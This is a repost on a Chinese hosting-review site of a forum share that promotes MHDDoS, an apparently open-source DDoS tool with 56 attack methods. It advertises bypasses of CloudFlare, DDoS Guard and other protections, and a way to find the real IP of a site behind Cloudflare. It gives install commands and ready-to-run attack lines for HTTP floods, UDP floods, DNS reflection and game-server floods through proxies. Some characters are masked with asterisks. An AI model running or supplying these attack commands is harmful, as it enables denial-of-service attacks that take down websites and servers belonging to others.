致力于为用户提供真实的
主机测评数据及优惠信息

[不限流量] 【分享】MHDDoS - 有56种方法的DDoS攻击脚*

网友 NoctuG 说:

项目地址:https://github.com/Mat**xTM/MHDDoS
作者提示:Please Don’t Attack websites without the owners consent.

——————————————————————
重要特性(详情请查看 readme):
Bypa** OVH
Bypa** chk_captcha
Send HTTP Packet With High Byte
A New Method With Random SubDomain
Like Google bot
Google P**ject Shield Bypa**
CloudFlare Bypa**
DDoS Guard Bypa**
CloudFlare Under Attack Mode Bypa**
Find Real IP Addre** Of Websites Powered By Cloudflare
——————————
自动安装
git clone https://github.com/MHP**Dev/MHDDoS.git
cd MHDDoS
pip install -r re*uirements.txt
——————————-
DockerFile
docker pull ghcr.io/mhp**dev/mhddos:la****
———————————
手动安装
python3 -m pip install cfsc****<=2.1.1
python3 -m pip install certifi<=2021.10.8
python3 -m pip install dnspython>=2.2.0
python3 -m pip install re*uests==2.27.1
python3 -m pip install impacket==0.9.23
python3 -m pip install psutil>=5.9.0
python3 -m pip install icmplib>=2.1.1
python3 -m pip install git+https://github.com/MHP**Dev/PyRoxy.git
python3 -m pip install yarl~=1.7.2
———————————–
例如:

Layer7 (Website):

# Running bypa** attack f**m 101 threads,
# with socks 5, 100 re*uests per p**xy (connection), for 3600 seconds  
python start.py bypa** https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack f**m 50 threads (be careful must be < 300)
# with all p**xies (0), 100 re*uests per p**xy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 p**xy.txt 100 3600

Layer4 (Server/Home):
# Running udp attack f**m 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack f**m 100 threads, for 3600 seconds  
# with reflector ******s f**m dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Runnin***inecraft attack f**m 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
Debug Mode (Log Attack status):
python start.py bypa** https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true

Tools/Help:
python start.py tools
python start.py ****

赞(0) 打赏
未经允许不得转载:爱主机 » [不限流量] 【分享】MHDDoS - 有56种方法的DDoS攻击脚*
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址